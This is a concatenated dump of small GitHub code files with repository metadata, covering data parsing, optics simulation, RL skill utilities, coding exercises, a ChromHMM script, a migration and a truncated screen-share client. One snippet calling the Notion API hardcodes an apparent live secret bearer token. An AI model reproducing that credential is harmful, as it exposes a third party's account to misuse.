dfx['company'],\n 'spotlight': dfx['spotlight'],\n 'code': dfx['code'],\n 'indexes': indexes,\n })\n\n dfr = (df.groupby(['company', 'spotlight', 'code'])\n .apply(_)\n .reset_index(drop=True))\n\n dfr['refdate'] = self._data['header']['update']\n dfr['duration_start_month'] = self._data['header']['startMonth']\n dfr['duration_end_month'] = self._data['header']['endMonth']\n dfr['duration_year'] = self._data['header']['year']\n\n dfr = dfr.rename(columns={\n 'company': 'corporation_name',\n 'spotlight': 'specification_code',\n 'code': 'symbol'\n })\n\n self._table = dfr\n\n @property\n def data(self):\n return self._table","repo_name":"datalab42/kyd","sub_path":"kyd/parsers/b3.py","file_name":"b3.py","file_ext":"py","file_size_in_byte":19365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"7559535602","text":"sentence = input(\"Enter your sentence here - \")\nlength = len(sentence)\nnumbers = 0\nletters = 0\nspace = 0\nrandom = 0\nfor i in sentence:\n if i.isalpha():\n letters += 1\n elif i.isnumeric():\n numbers += 1\n elif i.isspace():\n space += 1\n else:\n random +=1\nprint(\"Letters in sentence are - \",letters)\nprint(\"Numbers in sentence are - \",numbers)\nprint(\"Spaces in sentence are - \",space)\nprint(\"Random variables in sentence are - \",random)","repo_name":"SnehaMishra28/Python-DeepLearning_Fall2018","sub_path":"Mod1_ICP1/Source/part-1/ICP1(3).py","file_name":"ICP1(3).py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42187835569","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom os.path import abspath\nfrom pluginplot import Plugin\n\ndef main():\n plugin = Plugin(folder=abspath('plugins'))\n plugin.register_plots()\n\n content = \"This is test message\"\n encoded = plugin.apply_filter('encode', content)\n decoded = plugin.apply_filter('decode', encoded)\n\n plugin.do_action('out_html', encoded, decoded)\n plugin.do_action('out_json', {\n 'encoded': encoded,\n 'decoded': decoded\n })\n\nif __name__ == '__main__':\n main()\n","repo_name":"zeuxisoo/python-pluginplot","sub_path":"examples/plots/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"9088550427","text":"# Lau effect for a grating using analytical solution\n\n# Assuming plane wave\n# More accurate results with lower angle sampling interval\n# High computational cost\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom optwavepckg import OptWave\nfrom optwavepckg.utils import normalize, intensity\n\n'''\n Fourier coefficients of binary amplitude grating (An).\n \n Parameters:\n - n (int): coefficient order\n - f (double): opening fraction / duty cycle / fill factor\n'''\ndef fourier_coef_amp_gr(n, f):\n if n == 0:\n return f\n else:\n return np.sin(n*np.pi*f)/(n*np.pi)\n \n'''\n Fourier coefficients of sine grating \n T(x) = 1/2 + 1/2 * cos(2*pi*x/P)\n \n Parameters:\n - n (int): coefficient order\n'''\ndef fourier_coef_sin_gr(n):\n if n == 0:\n return 1/2\n elif abs(n) == 1:\n return 1/4\n else:\n return 0\n \n'''\n Fourier coefficients of binary phase grating\n \n T(x) = exp(-j*phi*G), where G = binary amplitude grating\n \n Parameters:\n - n (int): coefficient order\n - f (double): fill factor\n - phi (double): phase\n'''\ndef fourier_coef_phase_gr(n, f, phi):\n if n == 0:\n return 1 - f + f * np.exp(-1j*phi)\n else:\n a = np.exp(-1j*phi) - 1\n b = n*np.pi\n return a*np.sin(b*f)/b\n \n'''\n Fourier coefficient for a given grating\n \n Parameters:\n - n (int): coefficient order\n - kind (string): gratind type - 'amplitude', 'phase', 'sine'\n - params (dictionary): grating parameters\n - f (double): duty cycle (amp/phase gr)\n - phi (double): phase (phase gr)\n'''\ndef get_fourier_coef(n, kind, params):\n if kind == 'amplitude': \n An = fourier_coef_amp_gr(n, params[\"f\"])\n elif kind == 'phase':\n An = fourier_coef_phase_gr(n, params[\"f\"], params[\"phi\"])\n elif kind == 'sine':\n An = fourier_coef_sin_gr(n)\n return An\n \n'''\n Wave after 1 grating\n Included for testing purposes\n \n Parameters:\n - x (numpy.array): x-space\n - wvl: wavelength\n - theta: wave angle of incidence (w.r.t normal of grating)\n - z: propagation distance between grating and observation plane\n - p: grating period\n - nmax: maximum order for fourier series of grating\n - kind: grating type - 'amplitude', 'phase', 'sine'\n - grparams: (optional parameters)\n - f (double): fill factor for amp and phase gr\n - phi (double): phase for phase gr\n'''\ndef lau_wave_1gr(x, wvl, theta, z, p, nmax, kind, **grparams):\n u = np.zeros_like(x, dtype=complex)\n \n k = 2 * np.pi / wvl\n kp = 2 * np.pi / p\n kth = k * np.sin(theta)\n \n for n in range(-nmax,nmax+1):\n An = get_fourier_coef(n, kind, grparams)\n phase = np.exp(1j*(kth+n*kp)*x + 1j*(k-(kth+n*kp)**2/(2*k))*z)\n u += An * phase\n \n return u\n \n'''\n Wave after 2 gratings.\n Assuming both gratings are equal\n \n Parameters:\n - x (numpy.array): x-space\n - wvl: wavelength\n - theta: wave angle of incidence (w.r.t normal of grating)\n - L1: propagation distance between first and second grating\n - L2: propgation distance between second grating and observation plane\n - p: grating period\n - nmax: maximum order for fourier series of grating\n - kind: grating type - 'amplitude', 'phase', 'sine'\n - grparams: (optional parameters)\n - f (double): fill factor for amp and phase gr\n - phi (double): phase for phase gr\n'''\ndef lau_wave_2gr(x, wvl, theta, L1, L2, p, nmax, kind, **grparams):\n u = np.zeros_like(x, dtype=complex)\n \n k = 2 * np.pi / wvl\n kp = 2 * np.pi / p\n kth = k * np.sin(theta)\n \n for n in range(-nmax,nmax+1):\n An = get_fourier_coef(n, kind, grparams)\n if An==0:\n continue\n \n phase1 = np.exp(-1j*(kth+n*kp)**2*L1/(2*k))\n \n uaux = np.zeros_like(u, dtype=complex) \n for m in range(-nmax, nmax+1):\n Am = get_fourier_coef(m, kind, grparams) \n if Am==0:\n continue\n phase2 = np.exp(1j*(kth+(n+m)*kp)*x)\n phase3 = np.exp(-1j*(kth+(n+m)*kp)**2*L2/(2*k))\n uaux += Am * phase2 * phase3 \n \n u += An * phase1 * uaux\n \n return u \n \n# -------------------------------\n\n# Sim parameters\nN = 10000 # number of points\nL = 20e-3 # grid size\nwvl = 589e-9 # wavelength\nP = 200e-6 # grating period\n\nz_talbot = 2*P**2/wvl\n\nkind = 'amplitude'\nf = 0.1 # grating duty cycle\nphi = np.pi\n\nL1 = z_talbot/2\nL2 = L1\nnmax = 20 # maximum order for grating fourier series\n\nangles = np.linspace(-0.05, 0.05, 51)\n\nx = np.arange(-N//2, N//2)*(L/N)\n \n# Plot intensity pattern \n\nI = np.zeros_like(x)\n\nfor ang in angles:\n print(\"angle: {}\".format(ang))\n u = lau_wave_2gr(x, wvl, ang, L1, L2, P, nmax, kind=kind, f=f, phi=phi)\n I += intensity(u)\n \nI = normalize(I)\n\n# Grating pattern for reference\nwave = OptWave(N,L,wvl)\nwave.planeWave()\nwave.rectAmplitudeGrating(P, f)\nplt.plot(wave.x, intensity(normalize(wave.U)))\n\nplt.plot(x, I)\nplt.xlim(-500e-6, 500e-6)\nplt.xlabel(\"x [m]\")\nplt.ylabel(\"Intensity [arbitrary units]\")\nplt.show()\n","repo_name":"RogerSG11/TFG-moire-interferometry","sub_path":"optical_wave_diffraction/lau_analytical.py","file_name":"lau_analytical.py","file_ext":"py","file_size_in_byte":5324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14774540622","text":"import viz_utils\nimport torch\nfrom collections import defaultdict\nimport numpy as np\nNUM_TYPE_SKILLS = 3\nMAX_T = {'parking':25}\n\ndef entropy_actions(action_list):\n change_action = 0\n curr_action = action_list[0]\n for a in action_list:\n if(curr_action != a):\n change_action += 1\n curr_action = a\n return change_action / len(action_list)\n\ndef entropy_rewards(reward_list):\n return reward_list[-1]\n\ndef score_episode(args_dict, action_list, reward_list):\n if(args_dict[\"env_name\"] == \"lunar\"):\n return entropy_actions(reward_list)\n elif(args_dict[\"env_name\"] == \"parking\"):\n return entropy_rewards(reward_list)\n else:\n return None\n\ndef close_state(target_x, target_y, curr_x, curr_y):\n target_x = int(target_x*100)\n target_y = int(target_y*100)\n curr_x = int(curr_x*100)\n curr_y = int(curr_y*100)\n return (target_x == curr_x) and (target_y == curr_y)\n\ndef get_goal_xy_from_state(target_state):\n return target_state[6], target_state[7]\n\ndef get_goal_hxy_from_state(target_state):\n return target_state[10], target_state[11]\n\ndef get_state_hxy(target_state):\n return target_state[4], target_state[5] \n\ndef get_state_xy(target_state):\n return target_state[0], target_state[1] \n \ndef filter_state_conditions(target_state): \n filter_parking_spots = [(0.26, 0.14), (0.22, 0.14), (0.18, 0.14)] # filter to select spots\n true_spot = False\n for parking_spot in filter_parking_spots:\n gx, gy = get_goal_xy_from_state(target_state)\n if(close_state(gx, gy, parking_spot[0], parking_spot[1])):\n true_spot = True \n target_hx, target_hy = get_state_hxy(target_state)\n goal_hx, goal_hy = get_goal_hxy_from_state(target_state)\n return true_spot #and target_hx < 0 #target_hy > 0.2\n\ndef apply_parking_filter(states, actions, rews, seeds, lengths):\n new_states = []\n new_actions = []\n new_rews = []\n new_seeds = []\n new_lengths = []\n for episode in range(len(states)):\n all_states = states[episode][:lengths[episode]]\n if(not filter_state_conditions(all_states[0])):\n continue\n new_states.append(states[episode].numpy())\n new_actions.append(actions[episode].numpy())\n new_rews.append(rews[episode].numpy())\n new_seeds.append(seeds[episode].numpy())\n new_lengths.append(lengths[episode].item())\n return torch.FloatTensor(new_states), torch.FloatTensor(new_actions), torch.FloatTensor(new_rews), torch.FloatTensor(new_seeds),torch.LongTensor(new_lengths)\n\n\ndef get_target_rollouts(args_dict):\n model, batch, args = viz_utils.load_model_and_batch(args_dict)\n logs = defaultdict(lambda: defaultdict(list))\n states, actions, rews, lengths, seeds = batch \n if(args_dict[\"env_name\"] == \"parking\"):\n print(\"Applying Parking Filter\")\n states, actions, rews, seeds, lengths = apply_parking_filter(states, actions, rews, seeds, lengths)\n for skill in range(NUM_TYPE_SKILLS):\n for ei in range(args_dict[\"num_episodes\"]):\n if(args_dict[\"same_traj\"] and not args_dict[\"filter_episodes\"]):\n episode = 0\n elif(args_dict[\"filter_episodes\"]):\n episode = args_dict[\"filter_episodes\"][ei % len(args_dict[\"filter_episodes\"])]\n else:\n episode = ei\n all_states = states[episode][:lengths[episode]]\n all_actions= actions[episode][:lengths[episode]]\n all_rews = rews[episode][:lengths[episode]]\n seed = int(seeds[episode].item())\n if(args_dict[\"env_name\"] == \"lunar\"):\n logs[\"states\"][skill].append(all_states.tolist())\n logs[\"rews\"][skill].append(all_rews.tolist())\n logs[\"actions\"][skill].append([a-1 for a in all_actions])\n elif(args_dict[\"env_name\"] == \"parking\"):\n logs[\"states\"][skill].append(all_states)\n logs[\"rews\"][skill].append(all_rews)\n logs[\"actions\"][skill].append(all_actions)\n logs[\"seed\"][skill].append(seed)\n if(args_dict[\"compile_dir\"]):\n logs[\"compile\"][skill].append(get_target_compile_skills(args_dict, episode)[skill])\n logs[\"time\"][skill].append(get_target_time_skills(args_dict, episode, NUM_TYPE_SKILLS)[skill])\n else:\n logs[\"compile\"][skill].append(None)\n logs[\"time\"][skill].append(None)\n return dict(logs)\n\ndef get_sample_rollouts(args_dict):\n latent_skills_dict, states, lengths = get_all_skills(args_dict)\n print(lengths[:5])\n logs = defaultdict(lambda: defaultdict(list))\n # filter by specific skill\n if(args_dict[\"chosen_skills\"]):\n for skill_idx in range(NUM_TYPE_SKILLS):\n chosen_skill = args_dict[\"chosen_skills\"][skill_idx]\n for idx in args_dict[\"idx_for_fixed_skills\"][chosen_skill]:\n logs[\"states\"][skill_idx].append(latent_skills_dict[\"states\"][chosen_skill][idx])\n logs[\"actions\"][skill_idx].append(latent_skills_dict[\"actions\"][chosen_skill][idx])\n logs[\"rews\"][skill_idx].append(latent_skills_dict[\"rews\"][chosen_skill][idx])\n logs[\"seed\"][skill_idx].append(latent_skills_dict[\"seed\"][chosen_skill][idx])\n logs[\"compile\"][skill_idx].append(latent_skills_dict[\"compile\"][chosen_skill][idx])\n episode = latent_skills_dict[\"episode\"][chosen_skill][idx]\n time_frames = get_target_time_skills(args_dict, episode, NUM_TYPE_SKILLS)\n logs[\"time\"][skill_idx].append(time_frames[skill_idx])\n # no skill filter\n else:\n for skill_idx in range(NUM_TYPE_SKILLS):\n for idx in range(args_dict[\"num_episodes\"]):\n logs[\"states\"][skill_idx].append(latent_skills_dict[\"states\"][skill_idx][idx])\n logs[\"actions\"][skill_idx].append(latent_skills_dict[\"actions\"][skill_idx][idx])\n logs[\"rews\"][skill_idx].append(latent_skills_dict[\"rews\"][skill_idx][idx])\n logs[\"seed\"][skill_idx].append(latent_skills_dict[\"seed\"][skill_idx][idx])\n logs[\"compile\"][skill_idx].append(latent_skills_dict[\"compile\"][skill_idx][idx])\n episode = latent_skills_dict[\"episode\"][skill_idx][idx]\n time_frames = get_target_time_skills(args_dict, episode, NUM_TYPE_SKILLS)\n logs[\"time\"][skill_idx].append(time_frames[skill_idx])\n return dict(logs)\n\n\n#Get Compile Skills for a Target Episode, helper function for full rollouts\ndef get_target_compile_skills(args_dict, episode):\n print(\"Getting Compile Skills for Rollout\")\n model, batch, compile_args = viz_utils.load_model_and_batch(args_dict)\n states, actions, rews, seeds, lengths = batch\n if(args_dict[\"env_name\"] == \"parking\"):\n print(\"Applying Parking Filter\")\n states, actions, rews, seeds, lengths = apply_parking_filter(states, actions, rews, seeds, lengths) \n model.training = False\n outputs = model.forward(states, actions, lengths)\n z, z_idx, boundaries_by_latent, segments_by_latent, latents_by_segment, boundaries_by_episode = viz_utils.get_latent_info(outputs=outputs, lengths=lengths, args=compile_args)\n target_boundaries = [b for b in boundaries_by_episode[episode] if b[1]-b[0] >= args_dict[\"min_skill_length\"]]\n print(target_boundaries[::-1])\n return target_boundaries[::-1]\n\n#Get Temporal Skills for a Target Episode, helper function for full rollouts\ndef get_target_time_skills(args_dict, episode, num_split):\n print(\"Getting Time Skills for Rollout\")\n model, batch, compile_args = viz_utils.load_model_and_batch(args_dict)\n states, actions, rews, lengths, seeds = batch\n if(args_dict[\"env_name\"] == \"parking\"):\n print(\"Applying Parking Filter\")\n states, actions, rews, seeds, lengths = apply_parking_filter(states, actions, rews, seeds, lengths) \n episode_len = lengths[episode].item()\n target_boundaries = get_time_split_frames(episode_len, num_split)\n return target_boundaries[::-1]\n\n\ndef score_latent_skills(latent_skills_dict):\n print(\"Scoring Skills!\")\n for latent in latent_skills_dict['states'].keys():\n print((latent, len(latent_skills_dict['states'][latent])))\n \n\n\ndef get_all_skills(args_dict):\n model, batch, args = viz_utils.load_model_and_batch(args_dict)\n states, actions, rews, lengths, seeds = batch\n if(args_dict[\"env_name\"] == \"parking\"):\n print(\"Applying Parking Filter\")\n states, actions, rews, seeds, lengths = apply_parking_filter(states, actions, rews, seeds, lengths) \n model.training = False\n outputs = model.forward(states, actions, lengths)\n z, z_idx, boundaries_by_latent, segments_by_latent, latents_by_segment, boundaries_by_episode = viz_utils.get_latent_info(outputs, lengths, args)\n latent_skills_dict = defaultdict(lambda: defaultdict(list))\n for latent in viz_utils.get_latent_and_segment_std(segments_by_latent):\n boundaries = boundaries_by_latent[latent[0]]\n boundary_diff_bool = [b[1][1]-b[1][0] < args_dict[\"min_skill_length\"] for b in boundaries]\n if(all(boundary_diff_bool)):\n continue\n for b in boundaries:\n episode = b[0]\n if(b[1][1]-b[1][0] < args_dict[\"min_skill_length\"]+3):\n continue\n x1 = b[1][0] \n x2 = b[1][1]\n all_states = states[episode][:lengths[episode]]\n all_actions = actions[episode][:lengths[episode]]\n all_rews = rews[episode][:lengths[episode]]\n seed = int(seeds[episode].item())\n if(args_dict[\"env_name\"] == \"lunar\"):\n latent_skills_dict[\"states\"][latent[0]].append(all_states.tolist())\n latent_skills_dict[\"actions\"][latent[0]].append([a-1 for a in all_actions])\n latent_skills_dict[\"rews\"][latent[0]].append(all_rews.tolist())\n elif(args_dict[\"env_name\"] == \"parking\"):\n latent_skills_dict[\"states\"][latent[0]].append(all_states)\n latent_skills_dict[\"actions\"][latent[0]].append(all_actions)\n latent_skills_dict[\"rews\"][latent[0]].append(all_rews)\n latent_skills_dict[\"seed\"][latent[0]].append(seed)\n latent_skills_dict[\"compile\"][latent[0]].append([x1, x2])\n latent_skills_dict[\"episode\"][latent[0]].append(episode)\n score_latent_skills(latent_skills_dict)\n return latent_skills_dict, states, lengths\n\ndef get_eval_seeds(args_dict):\n model, batch, args = viz_utils.load_model_and_batch(args_dict)\n states, actions, rews, lengths, seeds = batch\n if(args_dict[\"env_name\"] == \"parking\"):\n print(\"Applying Parking Filter\")\n states, actions, rews, seeds, lengths = apply_parking_filter(states, actions, rews, seeds, lengths) \n print(seeds[:20])\n\ndef get_time_split_frames(max_t, num_split):\n split_size = int(max_t/num_split) \n frames = []\n all_frames = []\n for x in range(split_size, max_t+1, split_size):\n frames.append([x-split_size, x])\n # go to end of trajectory\n frames[-1][-1] = max_t\n return frames\n\n\n","repo_name":"Stanford-ILIAD/teaching","sub_path":"compile/skill_utils.py","file_name":"skill_utils.py","file_ext":"py","file_size_in_byte":11192,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"24859520003","text":"import numpy as np\n\n\ndef softmax(x, axis):\n \"\"\"\n Implements a *stabilized* softmax along the correct index\n https://www.deeplearningbook.org/contents/numerical.html\n\n Do not use scipy to implement this function!\n \"\"\"\n x = np.atleast_2d(x)\n max = np.max(x,axis=axis)\n x_sub = x - np.array([max,max]).T\n e = np.exp(x_sub)\n summation = np.sum(e,axis=axis)\n \n e[:,0] = e[:,0]/summation\n e[:,1] = e[:,1]/summation\n\n return e\n","repo_name":"devbhura/Machine-Learning","sub_path":"hw4-bayes/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12964883468","text":"from matplotlib import pyplot as plt\n\n# This will have data by year based on the number of bedrooms and price per square foot\n\nx_labels = [\"Studio\", \"1-BR\", \"2-BR\", \"3-BR\", \"4+-BR\"]\nx = [0,1,2,3,4]\ny0 = [1632, 1918,2498,3041, 4000]\ny1 = [1677, 2024, 2627,3367, 4400]\ny2 = [1563,1908,2490,3304,4375]\n\nax = plt.subplot()\nplt.plot(x,y0, color=\"gold\", marker='o')\nplt.plot(x, y1, color=\"blue\", marker='o')\nplt.plot(x,y2, color =\"green\", marker='o')\nax.set_xticks([0,1,2,3,4])\nax.set_xticklabels(x_labels)\nax.yaxis.set_major_formatter('${x:1.0f}')\nplt.title(\"Rental Rates in Arlington County\")\nplt.xlabel(\"Number of Bedrooms\")\nplt.ylabel(\"Amount in Dollars\")\nplt.legend([2019,2020,2021], loc=4)\nplt.show()","repo_name":"Xpress0/Python-playground","sub_path":"arlington_rentals.py","file_name":"arlington_rentals.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31156885234","text":"'''mapper.py'''\r\n\r\nimport sys\r\n\r\n# input comes from STDIN\r\nfor line in sys.stdin:\r\n label, sentence = line.strip().split('\\t', 1)\r\n\r\n # 将句子分割为词\r\n words = sentence.split()\r\n\r\n # 分割为\r\n for word in words:\r\n print(f'{word}\\t{1}')","repo_name":"ouyhlan/Distributed-System-Final-Project","sub_path":"src/WordCount/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29192015168","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.Node = None\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def insert(self, data):\n new_node = Node(data)\n new_node.next = self.head\n self.head = new_node\n\n def print_list(self):\n temp = self.head\n while temp:\n print(temp.data, end=' ')\n temp = temp.next\n print('\\n')\n\n def delete_position(self, position):\n temp = self.head\n prev = self.head\n\n for i in range(1, position+1):\n if i == position and position == 1:\n self.head = self.head.next\n temp = None\n prev = None\n elif i == position:\n prev.next = temp.next\n temp = None\n else:\n prev = temp\n temp = temp.next\n # if position is greater than number of element in list\n if temp is None:\n break\n\n def deletion_key(self, key):\n if self.head.data == key:\n self.head = self.head.next\n return\n\n temp = self.head\n prev = self.head\n\n while temp is not None and temp.data != key:\n prev = temp\n temp = temp.next\n # if condition is to handle situation if key not present in list\n if temp is not None:\n prev.next = temp.next\n temp = None\n\n\nif __name__ == '__main__':\n ll = LinkedList()\n for i in range(1, 6):\n ll.insert(i)\n ll.print_list()\n ll.delete_position(6)\n ll.print_list()\n ll.deletion_key(10)\n ll.print_list()\n\n","repo_name":"cspandit/Python-DS-and-Algo","sub_path":"single_link_list/operations/deletion.py","file_name":"deletion.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11188267591","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/9/12 23:38\n# @Author : Rong\n# @email : mrrong0720@163.com\n\n# 给定一个包括 n 个整数的数组 nums 和 一个目标值 target。找出 nums 中的三个整数,使得它们的和与 target 最接近。返回这三个数的和。假定每组输入只存在唯一答案。\n# 示例:\n# 输入:nums = [-1,2,1,-4], target = 1\n# 输出:2\n# 解释:与 target 最接近的和是 2 (-1 + 2 + 1 = 2) 。\n# 提示:\n#\n# 3 <= nums.length <= 10^3\n# -10^3 <= nums[i] <= 10^3\n# -10^4 <= target <= 10^4\nfrom typing import List\n\n\nclass Solution:\n def threeSumClosest(self, nums: List[int], target: int) -> int:\n n = len(nums)\n nums.sort() # 排序\n ans = float('inf')\n\n for first in range(n - 2): # 枚举第一个元素\n if first > 0 and nums[first] == nums[first - 1]: continue # 保证first不会有重复\n\n second, third = first + 1, n - 1\n max_sum = nums[first] + nums[-2] + nums[-1]\n min_sum = nums[first] + nums[first + 1] + nums[first + 2]\n if max_sum <= target: # 最大的数\n if abs(max_sum - target) < abs(ans - target):\n ans = max_sum\n continue\n elif min_sum >= target: # 最小的数\n if abs(min_sum - target) < abs(ans - target):\n ans = min_sum\n break\n\n while second < third:\n two_sum_target = target - nums[first]\n s = nums[second] + nums[third]\n if abs(s + nums[first] - target) < abs(ans - target):\n ans = s + nums[first]\n if s > two_sum_target: # 当前数值太大 右指针左移\n third -= 1\n while third > second and nums[third] == nums[third + 1]:\n third -= 1\n elif s < two_sum_target: # 当前数值太小 左指针右移\n second += 1\n while third > second and nums[second] == nums[second - 1]:\n second += 1\n else: # 刚好等于 直接返回target即可\n return target\n\n return ans\ns = Solution()\nprint(s.threeSumClosest([-1,2,1,-4],1))","repo_name":"BrotherRong/leetcode","sub_path":"Python/16_threeSumClosest.py","file_name":"16_threeSumClosest.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29823360777","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport argparse\nfrom textwrap import dedent\nimport yaml\nimport matplotlib as mpl\nimport pybedtools\nfrom pybedtools import featurefuncs as ff\n\nconfig_example = dedent(\n \"\"\"\n # After chromhmm.snakefile has been run, view the output and make\n # a decision on on what model to use. Enter that info here:\n final_model:\n subset: subset1\n states: 6\n celltype: umel\n\n # Decide on the labels and colors you want to use. \"E1\" etc are the\n # existing labels and correspond to the emission heatmaps for the model.\n\n label_mapping:\n # existing label new label color (hex)\n # ---------------- ---------------- -----------\n - ['E1', 'Active_TSS', '#5AA02C']\n - ['E2', 'CTCF_open', '#4A80C8']\n - ['E3', 'Enhancer', '#FA9B00']\n - ['E4', 'weak_enhancer', '#FAF400']\n - ['E5', 'no_signal', '#808080']\n - ['E6', 'repressed', '#323232']\n \"\"\")\n\nusage = dedent(\n \"\"\"\n Colorizes and re-labels output from ChromHMM.\n\n Colors and labels are configured via a YAML-format file. A documented\n example can be generated with the --example-config option.\n \"\"\")\n\nap = argparse.ArgumentParser(usage=usage)\nap.add_argument('--config', help='Config file to use')\nap.add_argument('--example-config', action='store_true',\n help='Print an example config YAML and exit')\nargs = ap.parse_args()\n\nif args.config is None and args.example_config is None:\n ap.print_help()\n sys.exit(0)\n\nif args.example_config:\n print(config_example)\n sys.exit(0)\n\ndef hex2rgb(x):\n \"\"\"\n BED files need CSV RGB, like \"128,34,234\", so convert hex colors to this\n format.\n \"\"\"\n return ','.join(\n map(\n str,\n (255 * mpl.colors.colorConverter.to_rgba_array(x))[0,:3].astype(int)\n )\n )\n\ncfg = yaml.load(open(args.config))\n\n# identify the BED file to use\nbed = (\n 'models/{c[subset]}/{c[states]}/{c[celltype]}_{c[states]}_segments.bed'\n .format(c=cfg['final_model'])\n)\nif not os.path.exists(bed):\n raise ValueError(\"Cannot find file '{0}'.\".format(bed))\n\n\nlabels = {}\ncolors = {}\nfor existing, new, color in cfg['label_mapping']:\n labels[existing] = new\n colors[existing] = hex2rgb(color)\n\ndef transform(f):\n f = ff.extend_fields(f, 9)\n label = labels[f[3]]\n color = colors[f[3]]\n f[8] = color\n f[3] = label\n return f\n\nprint(pybedtools.BedTool(bed).each(transform))\n","repo_name":"daler/chromhmm-enhancers-umel","sub_path":"colorize_model.py","file_name":"colorize_model.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"18813650769","text":"# merge sort algorithm.\n\n# space bhut jyada. use ho raha h .\n\ndef merge_two_sorted_array(left,right):\n sorted_array = []\n\n first_length = len(left)\n secound_length = len(right)\n\n i = j = 0\n\n while i < first_length and j < secound_length:\n if left[i] < right[j]:\n sorted_array.append(left[i])\n i += 1\n else:\n sorted_array.append(right[j])\n j += 1\n \n while i < first_length:\n sorted_array.append(left[i])\n i += 1\n \n while j < secound_length:\n sorted_array.append(right[j])\n j += 1\n\n return sorted_array\n\n\ndef merg_sort(arr):\n\n # 2 // 2 = 1\n # 0 nahi hota.\n\n if len(arr) <= 1:\n return arr\n mid = len(arr) // 2\n left = arr[:mid]\n right = arr[mid:]\n\n left = merg_sort(left)\n right = merg_sort(right)\n\n return merge_two_sorted_array(left,right)\n\n\narr = [5,6,2,1,0]\nprint(merg_sort(arr))\n","repo_name":"Saurabh1Barasiya/100_days_of_code","sub_path":"DSA/LinkList/merge_two_sorted_link_list/0_3_merge_sort.py","file_name":"0_3_merge_sort.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13757502726","text":"import requests\n\nurl = \"https://api.notion.com/v1/databases/63d758d87e41483ebab7def5d939f616\"\n\nheaders = {\n \"Accept\": \"application/json\",\n \"Notion-Version\": \"2022-02-22\",\n \"Authorization\": \"Bearer secret_V03L7Q3wQGwizHR1KStIE5yT3m1PM36JJhUouWfEdTj\"\n}\n\nresponse = requests.get(url, headers=headers)\n\nprint(response.text)","repo_name":"wlsvy/TIL","sub_path":"Document/NotionAutomation/try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11064715889","text":"import pandas as pd\r\ndata_set = pd.read_csv(r'C:\\Users\\Mr. Abhinav\\Desktop\\my new file.csv')\r\nprint(data_set)\r\na=data_set\r\nimport numpy as np\r\n\r\ny=a['Data_value']\r\nb=list(a['Period'])\r\n\r\nb=[int(x) for x in b]\r\nb=np.array(b,dtype=np.int64,order='F')\r\nprint(b)\r\nb=np.reshape(b,(65748,1),order='F')\r\n\r\nprint(b.shape)\r\nfrom sklearn.linear_model import LinearRegression\r\nmind=LinearRegression()\r\nmind.fit(b,y)\r\nprint(mind.predict([[2050.01]]))","repo_name":"abhinavisgood/MyWork","sub_path":"my new mergeing program.py","file_name":"my new mergeing program.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13557331675","text":"\"\"\"Adding email column to the users table\n\nRevision ID: eca2190b17cc\nRevises: 6719bdb8c6a1\nCreate Date: 2021-03-11 13:00:32.040906\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'eca2190b17cc'\ndown_revision = '6719bdb8c6a1'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('users', sa.Column('email', sa.String(length=80), nullable=False))\n op.create_unique_constraint('users_email_key', 'users', ['email'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint('users_email_key', 'users', type_='unique')\n op.drop_column('users', 'email')\n # ### end Alembic commands ###\n","repo_name":"stejstin1/PythonSqlAlchemy","sub_path":"migrations/versions/eca2190b17cc_adding_email_column_to_the_users_table.py","file_name":"eca2190b17cc_adding_email_column_to_the_users_table.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33860970082","text":"#import time\r\nfrom config import ConfigFactory\r\nfrom config import Project\r\nfrom config import ScreenStreamConfig\r\nfrom streaming import ScreenShareClient\r\n\r\nif __name__ == \"__main__\":\r\n def main():\r\n cfg = ConfigFactory.config(Project.SCREENSTREAM)\r\n print(\"ip : {0}, port : {1}\".format(cfg.ip(), cfg.port()))\r\n \r\n sender = ScreenShareClient(cfg.ip(), 